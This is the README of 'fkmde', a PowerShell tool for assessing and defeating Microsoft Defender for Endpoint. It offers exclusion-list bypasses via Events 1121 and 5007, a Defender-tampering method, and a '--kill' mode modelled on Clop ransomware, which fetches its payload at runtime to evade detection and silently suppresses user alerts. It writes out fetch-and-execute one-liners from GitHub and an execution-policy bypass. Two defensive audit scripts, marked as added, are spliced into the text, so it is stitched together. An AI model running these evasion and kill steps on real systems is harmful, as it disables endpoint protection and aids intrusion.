fkmde

fkmde is a specialized PowerShell script designed to evaluate the configuration and operational security of Microsoft Defender for Endpoint (MDE). It aids security professionals, system administrators, and penetration testers in identifying potential vulnerabilities and misconfigurations that might be exploited in a real-world attack.

Features

  • Defender Full Audit: Quickly assesses the status of real-time protection, active/passive mode, tamper protection, BitLocker, memory integrity and exclusion settings to detect overly permissive rules that might allow malware to bypass scanning.
  • Bypass Exclusions and ASR Rules: Utilizes Event 1121 and 5007 to bypass the protected exclusions list in MDE.
  • Exclusion Enumeration: Allows for low privilege exclusion enumeration, without relying on event log bypass.
  • Defender Tampering: PendingFileRenameOperations + Junctions EDR Disable
  • Defender Killing: The script uses techniques similar to those used by Clop Ransomware to disable and evade Microsoft Defender.
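The read-only posture check below is an added example of what the "Defender Full Audit" items look like when expressed as defensive hygiene code; it is not fkmde's own code. It assumes the Defender and BitLocker PowerShell modules are available, that the HVCI state lives under the DeviceGuard\Scenarios registry key, and that the list of "risky" exclusion patterns is a starting heuristic rather than a complete one.

```powershell
# Added example (not part of fkmde): read-only Defender posture report.
# Run elevated for complete results; nothing here changes any setting.
function Get-DefenderPostureReport {
    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference
    $findings = [System.Collections.Generic.List[string]]::new()

    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is disabled') }
    if ($status.AMRunningMode -ne 'Normal')     { $findings.Add("Defender not in active mode (AMRunningMode=$($status.AMRunningMode))") }
    if (-not $status.IsTamperProtected)         { $findings.Add('Tamper protection is off') }

    # Memory integrity (HVCI): Enabled = 1. Assumed registry location for supported builds.
    $hvciKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity'
    $hvci = Get-ItemProperty -Path $hvciKey -ErrorAction SilentlyContinue
    if (-not $hvci -or $hvci.Enabled -ne 1) { $findings.Add('Memory integrity (HVCI) is not enabled') }

    # BitLocker on the OS volume
    $osVol = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction SilentlyContinue
    if (-not $osVol -or "$($osVol.ProtectionStatus)" -ne 'On') { $findings.Add("BitLocker protection is not On for $env:SystemDrive") }

    # Overly permissive exclusions: drive roots, wildcards, user-writable locations (heuristic list)
    $risky = '^[A-Za-z]:\\?$', '\*', '\\Users\\', '\\Temp\\', '\\ProgramData\\', '\\AppData\\', '\\Downloads\\'
    foreach ($p in $pref.ExclusionPath) {
        if ($risky | Where-Object { $p -match $_ }) { $findings.Add("Broad path exclusion: $p") }
    }
    foreach ($e in $pref.ExclusionExtension) {
        if ($e -in @('exe','dll','ps1','vbs','js','bat','cmd','hta')) { $findings.Add("Executable-type extension excluded: .$e") }
    }
    foreach ($proc in $pref.ExclusionProcess) {
        $findings.Add("Process exclusion (files it opens are not scanned): $proc")
    }

    # ASR rules not in block mode (1) are not enforcing: 0 = off, 2 = audit, 6 = warn
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($actions[$i] -ne 1) { $findings.Add("ASR rule $($ids[$i]) not in block mode (action=$($actions[$i]))") }
    }

    [pscustomobject]@{ Host = $env:COMPUTERNAME; Findings = $findings }
}

Get-DefenderPostureReport | Format-List
```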

Usage

fkmde.ps1
fkmde.ps1 --enum <path> [depth]
fkmde.ps1 --kill                     # Run the script from URL
fkmde.ps1 --kill <path>              # Specify a directory for the script to download & execute from
  • --kill Parameter
    This parameter triggers a script that implements techniques similar to those used by Clop Ransomware to disable and evade Microsoft Defender. The script is not hardcoded into fkmde, but dynamically fetched from an external source to avoid pre-execution detection. This should be used only in secure, isolated environments for research purposes. It is possible to specify a custom directory using the optional argument to download and run the kill script.

  • --enum <path> [depth] Parameter
    This parameter performs a comprehensive enumeration of directories by using MpCmdRun.exe, scanning for exclusions or misconfigurations without relying on event logs or admin permissions. The script dynamically disables Windows Defender popup notifications during execution to provide a seamless experience without alerting users. Upon completion, it safely re-enables the notifications.

Note

Any scripts tampering with Defender are not directly embedded in fkmde. Instead, they are loaded dynamically to minimize detection by Defender for Endpoint when the tool is used solely for enumeration purposes.
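Because the exclusion-bypass feature above relies on Event 5007 carrying the changed registry value, the same event is what a defender can watch. The function below is an added example, not part of fkmde, that pulls recent 5007 events from the Defender operational log and flags changes to exclusion lists or to protection switches; the watch-list patterns are an assumption based on the registry paths those events normally quote.

```powershell
# Added example (not part of fkmde): alert on Defender configuration changes.
# Event 5007 = "antimalware platform configuration changed"; its message quotes
# the registry value that changed, so exclusion edits are visible in the log.
function Get-DefenderConfigChangeAlerts {
    param([int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    # Patterns worth alerting on (assumed watch-list; extend for your environment)
    $watch = @(
        '\\Exclusions\\(Paths|Extensions|Processes)\\',
        'DisableRealtimeMonitoring',
        'DisableAntiSpyware',
        'TamperProtection'
    )
    foreach ($ev in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $hit = $watch | Where-Object { $ev.Message -match $_ } | Select-Object -First 1
        if ($hit) {
            [pscustomobject]@{
                Time   = $ev.TimeCreated
                Rule   = $hit
                Detail = ($ev.Message -replace '\s+', ' ')
            }
        }
    }
}

Get-DefenderConfigChangeAlerts -Hours 48 | Format-Table -AutoSize -Wrap
```

Pair this with a forwarded copy of the log (or your SIEM's equivalent query), since an attacker who can edit exclusions can usually clear the local log as well.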

The script can also be run with and without parameterized modes directly from GitHub.

  # basic method with iex
  Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fkxdr/fkmde/refs/heads/main/fkmde.ps1')

  # parameterized mode with iex and irm
  Invoke-Expression "& { $(Invoke-RestMethod https://raw.githubusercontent.com/fkxdr/fkmde/refs/heads/main/fkmde.ps1) } --enum C:\Windows 3"

By default, the PowerShell execution policy is set to Restricted on clients, and RemoteSigned on servers, when a new powershell.exe process is started. These policies block the execution of (unsigned) scripts, but they can be overridden within the current scope. However, this trick does not work when the execution policy is enforced through a GPO. In this case, after starting a new PowerShell session, you can load the script with the second command.

Set-ExecutionPolicy Bypass -Scope Process -Force
Get-Content .\fkmde.ps1 | Out-String | Invoke-Expression

flowchart TD
    start((Microsoft Defender))
    
    start --> MDEENUM[Enumerate Defender settings]
    MDEENUM --> |fkmde.ps1| MDEVULN[Identify vulnerable configurations]
    MDEENUM --> |Windows UI| MDEVULN
    
    MDEVULN --> MDEVULNASR[ASR rules]
    MDEVULNASR --> |officemacro32.docm| MDEASREXP[Exploit ASR misconfiguration]
    MDEVULNASR --> |wmiprocess.ps1| MDEASREXP
    
    MDEVULN --> MDEEXCLUSION[Defender exclusions]
    MDEEXCLUSION --> |fkmde.ps1| EXPLOITEXCL[Exploit exclusions]
    MDEEXCLUSION --> |fkmde.ps1 --enum| EXPLOITEXCL[Exploit exclusions]
    
    MDEVULN --> MDEMISCONF[Tamper Protection]
    MDEMISCONF --> |fkmde.ps1 --kill| MDEKILL[Kill Defender process]
    
    start --> MDEBYPASS[Attempt to bypass static Defender]
    MDEBYPASS --> |ps1-obfuscator.ps1| MDEBYPASS2[Bypass Defender]
    
    start --> MDESSCR[Review Smart Screen settings]
    MDESSCR --> |Test with URL| MDESSCRVULN[Exploit vulnerable Smart Screen]
Disclaimer

This tool is intended for educational and security research purposes only. The author is not responsible for misuse or for any damage that may occur from using this tool. It is the end user's responsibility to comply with all applicable laws and regulations. The use of this tool against targets without prior mutual consent is illegal.

Credits

  • VakninHai - Privilege Bypassing through Windows Event 5007
  • ViziosDe - Privilege Bypassing through Windows Event 1121
  • Friends Security - Exclusions through MpCmdRun.exe
  • rad9800 - PendingFileRenameOperations + Junctions EDR Disable

About

fkmde is designed to help testing various features in Microsoft Defender for Endpoint.
